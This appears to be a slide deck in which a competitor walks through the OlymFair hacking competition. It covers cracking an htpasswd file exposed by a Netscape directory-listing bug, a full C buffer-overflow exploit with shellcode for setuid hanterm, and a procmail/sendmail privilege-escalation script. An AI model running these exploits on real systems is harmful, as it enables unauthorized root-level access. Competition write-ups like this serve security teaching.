1 st OlymFair Workshop Hacking technique Taeho Oh

Contents How to pass level 1 How to pass level 2 Why did many hackers consume much time in the level 2? About level 3 Conclusion

How to pass level 1 (1) What to do? –Execute /cgi-bin/data/idaccess.cgi and get the way to go to level 2

How to pass level 1 (2) Level 1 servers – – –

How to pass level 1 (3) –OS : Solaris 8 –Opened TCP port : 80, 8080

How to pass level 1 (4) –OS : HPUX 11.0 –Opened TCP port : 22, 80, 8080

How to pass level 1 (5) –OS : MS Windows 2000 –Opened TCP port : 7, 9, 13, 17, 19, 25, 80, 135, 139, 443, 1025, 1026, 1032, 1723, 3389

How to pass level 1 (6) Attack –80 : Apache Web Server –8080 : Netscape Enterprise Server 80 and 8080 web server has same httpd home directory Netscape Enterprise Server has a security bug

How to pass level 1 (7) Netscape Enterprise Server security bug –I could see files in the specific directory like below –You can also use ?wp-ver-info, ?wp-html-rend, ?wp-usr- prop, ?wp-ver-diff, ?wp-verify-link, ?wp-start-ver, ?wp- stop-ver, and ?wp-uncheckout –I could browse the directories and check the file existence

How to pass level 1 (8) The file list / cgi-bin/ |+-----data/ |+-----hackme/ |+-----a |+-----a.c |+-----show_file.html |+-----showfile.cgi data/ index.html Can’t access this directory

How to pass level 1 (9) Read.htaccess file with showfile.cgi – bin/data/.htaccess Read.htpasswd file from.htaccess with showfile.cgi – bin/data/.htpasswd

How to pass level 1 (10) I could crack the encrypted password from.htpasswd with Crack –id:password = admin:banana –I could access /cgi-bin/data directory with this id and password

How to pass level 1 (11) I could get the way to go to level 2 – This page is the form that executes –My serial number KOR –My password oD8YEuqYySWogKSQQsOY00zoAjUkxtv7

How to pass level 1 (12) Netscape Enterprise Server directory indexing vulnerability –See ?vid=1063

How to pass level 1 (13) Netscape Enterprise Server directory indexing vulnerability patch information The Directory Indexing feature can be turned off via the Administration Interface. Selecting Content Management -> Document Preferences and changing Directory Indexing to "none" will disable this feature. Also, manually editing the file obj.conf will do the same. Conduct a search for the following: Service method="(GET|HEAD)" type="magnus- internal/directory" fn="index-common" and replace fn="index-common" with fn="send-error".

How to pass level 2 (1) What to do? –Execute /home/forbidden/pass.cgi This executable file owner is root This executable file group is wizard The permission is 0510 Need wizard gid to execute /home/forbidden/pass.cgi

How to pass level 2 (2) Level 2 server – –OS : Linux –Opened TCP port : 23, 81

How to pass level 2 (3) Wizard setuid or setgid files -r-sr-xr-x 1 wizard wizard Jan 4 09:40 /sbin/pwdb_chkpwd -rwsr-sr-x 1 wizard wizard Mar /sbin/dump -rwsr-xr-x 1 wizard wizard Apr /sbin/cardctl -rws--x--x 1 wizard wizard 6148 May /usr/X11R6/bin/Xwrapper -rws--x--x 1 wizard wizard May /usr/X11R6/bin/hanterm -rwsr-xr-x 1 wizard wizard Mar /usr/bin/at -rwsr-xr-x 1 wizard wizard 3208 Mar /usr/bin/disable-paste -r-sr-x--- 1 wizard wizard Aug /usr/bin/inndstart -r-sr-x--- 1 wizard wizard Aug /usr/bin/startinnfeed -r-sr-sr-x 1 wizard wizard Jan 7 07:41 /usr/bin/lpq -r-sr-sr-x 1 wizard wizard Jan 7 07:41 /usr/bin/lpr -r-sr-sr-x 1 wizard wizard Jan 7 07:41 /usr/bin/lprm

How to pass level 2 (4) Wizard setuid or setgid files ( Cont. ) -rws--x--x 2 wizard wizard Apr /usr/bin/suidperl -rws--x--x 2 wizard wizard Apr /usr/bin/sperl rwsr-sr-x 1 wizard wizard Apr /usr/bin/procmail -rwsr-xr-x 1 wizard wizard Apr /usr/bin/rcp -rwsr-xr-x 1 wizard wizard Apr /usr/bin/rlogin -rwsr-xr-x 1 wizard wizard 7780 Apr /usr/bin/rsh -rwxr-sr-x 1 wizard wizard May /usr/lib/emacs/20.3/i386- redhat-linux/mov -rwsr-sr-x 1 wizard wizard Apr /usr/sbin/sendmail -rwsr-xr-x 1 wizard wizard Mar /usr/sbin/traceroute -rwsr-xr-x 1 wizard wizard Jan 8 05:24 /usr/sbin/userhelper -rwxr-sr-x 1 wizard wizard 3860 Apr /sbin/netreport

How to pass level 2 (5) Attack process Get wizard euid Get wizard uid Create wizard uid, gid file Get wizard gid Execute pass.cgi Get level2 shell

How to pass level 2 (6) level2 shell  wizard euid –Exploit hanterm bug [I have no ]$ hanterm -hfn `perl -e "print 'A'x240"` can't load english font AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAA AAAAAAAAAAAAAAAAAAAAAAAA [I have no ]$ hanterm -hfn `perl -e "print 'A'x250"` Segmentation fault [I have no ]$

How to pass level 2 (7) level2 shell  wizard euid (Cont.) –This is a classical buffer overflow bug –I could get wizard euid shell with 260 buffer size and -450 offset

How to pass level 2 (8) Exploit code #include #define OFFSET -450 #define RET_POSITION 260 #define RANGE 20 #define NOP 0x90 char shellcode[1024]= "\xeb\x1f“/* jmp 0x1f */ "\x5e“/* popl %esi */ "\x89\x76\x08“/* movl %esi,0x8(%esi) */

How to pass level 2 (9) Exploit code (Cont.) "\x31\xc0“/* xorl %eax,%eax */ "\x88\x46\x07“/* movb %eax,0x7(%esi) */ "\x89\x46\x0c“/* movl %eax,0xc(%esi) */ "\xb0\x0b“/* movb $0xb,%al */ "\x89\xf3“/* movl %esi,%ebx */ "\x8d\x4e\x08“/* leal 0x8(%esi),%ecx */ "\x8d\x56\x0c“/* leal 0xc(%esi),%edx */ "\xcd\x80“/* int $0x80 */ "\x31\xdb“/* xorl %ebx,%ebx */ "\x89\xd8“/* movl %ebx,%eax */

How to pass level 2 (10) Exploit code (Cont.) "\x40“/* inc %eax */ "\xcd\x80“/* int $0x80 */ "\xe8\xdc\xff\xff\xff“/* call -0x24 */ "/bin/sh";/*.string \"/bin/sh\" */ unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc,char **argv) {

How to pass level 2 (11) Exploit code (Cont.) char buff[RET_POSITION+RANGE+1],*ptr; long *addr_ptr,addr; unsigned long sp; int offset=OFFSET,bsize=RET_POSITION+RANGE+1; int i; if(argc>1) offset=atoi(argv[1]); sp=get_sp(); addr=sp-offset; ptr=buff;

How to pass level 2 (12) Exploit code (Cont.) addr_ptr=(long*)ptr; for(i=0;i<bsize;i+=4) *(addr_ptr++)=addr; for(i=0;i<bsize-RANGE*2-strlen(shellcode);i++) buff[i]=NOP; ptr=buff+bsize-RANGE*2-strlen(shellcode)-1; for(i=0;i<strlen(shellcode);i++) *(ptr++)=shellcode[i]; buff[bsize-1]='\0';

How to pass level 2 (13) Exploit code (Cont.) execl("/usr/X11R6/bin/hanterm","hanterm",“- hfn",buff,0); }

How to pass level 2 (14) wizard euid  wizard uid [I have no ]$ cat > a.c main(){ setreuid(501,501); execl("/bin/sh","sh",0); } [I have no ]$ gcc a.c ;./a.out ]$ whoami wizard ]$

How to pass level 2 (15) wizard uid  create wizard uid, gid file –mov program is wizard setgid program mov program output file is wizard gid ]$ echo haha > test1 ]$ mov test1 test2 ]$ ls –l test1 test2 -rw-r--r-- 1 wizard hackers 0 Jul 10 02:03 test1 -rw-r--r-- 1 wizard wizard 5 Jul 10 02:03 test2 ]$ cat test2 haha

How to pass level 2 (16) wizard uid, gid file  wizard gid –procmail can execute a arbitrary shell command with wizard uid, gid when the user can create wizard uid, gid file

How to pass level 2 (17) Exploit code #!/bin/sh PATH=${PATH}:/usr/lib/emacs/20.3/i386-redhat-linux export PATH cat > shh.c << EOF main(){ setreuid(501,501); setregid(501,501); execl("/bin/sh","sh",0); } EOF

How to pass level 2 (18) Exploit code (Cont.) gcc shh.c -o shh mov shh shh2 cat > proc << EOF :0 * | /bin/chmod 6777 /tmp/shh2 EOF

How to pass level 2 (19) Exploit code (Cont.) mov proc /home/wizard/.procmailrc echo haha | /usr/sbin/sendmail -OQueueDirectory=/tmp wizard sleep 2 rm -f /home/wizard/.procmailrc rm -f./proc rm -f./exp rm -f./shh.c rm -f./shh echo "rm -f./shh2" |./shh2

How to pass level 2 (20) wizard gid  execute pass.cgi Congratulation!! You have passed Level 2. Your ID : KOR Initial Pass Time Stamp : :59:30GMT+9 IP for Level 3 is It is protected by ip filtering. Please attack and acquire adminstrator's privilege.And then change the index.htm l under level3 server. Level 3 Login ID : level3 Level 4 Login Passwd : olymfair3

Why did many hackers consume much time in the level 2? (1) Almost all hackers tried to find a security bug –However, level2 can be cleared with not a bug but a feature. ( except for hanterm bug )

Why did many hackers consume much time in the level 2? (2) /sbin/dump program has a buffer overflow bug and exploit is not released –Many hackers try to exploit this program. However, the exploit is impossible because main function does not return but exit

Why did many hackers consume much time in the level 2? (3) /usr/bin/lprm exploit code generates segmentation fault message –The segmentation fault message is not generated by /usr/bin/lprm. The message is generated by /usr/bin/lprm exploit code. It’s an exploit code bug.

About level 3 I consumed much time so I have no time to attack level 3 I tried to scan level 3 server –However, I can’t find opened TCP port –I didn’t try to attack level 3 from then on It seemed to take much time

Conclusion It was an interesting hacking competition